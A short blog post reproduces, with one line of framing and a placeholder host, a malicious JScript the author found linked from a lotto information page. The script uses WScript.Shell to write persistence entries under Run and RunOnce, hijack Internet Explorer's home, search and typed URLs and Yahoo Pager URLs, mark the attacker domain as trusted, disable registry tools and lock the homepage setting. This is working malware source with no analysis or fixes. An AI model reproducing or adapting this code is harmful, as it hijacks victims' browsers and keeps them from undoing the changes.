I found this amusing today. It is a javascript that was linked to a lotto information page. It changed some rather important registry keys
I’ve broken up some of the lines of code to make it fit this blog theme.
var url = "http://EVIL_SITE";
var burl = "http://EVIL_SITE";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\system32\\EVIL.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url6","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url9","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Calendar\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Games\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Launchcast\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Policies\\System\\DisableRegistryTools",1,
"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Policies\\Microsoft\\
Internet Explorer\\Control Panel\\Homepage",1,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\window title","-� EVIL_SITE �-");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\default_page_url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Save_Session_History_On_Exit","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\LinksFolderName",".::EVIL_SITE::. ");
Post a Comment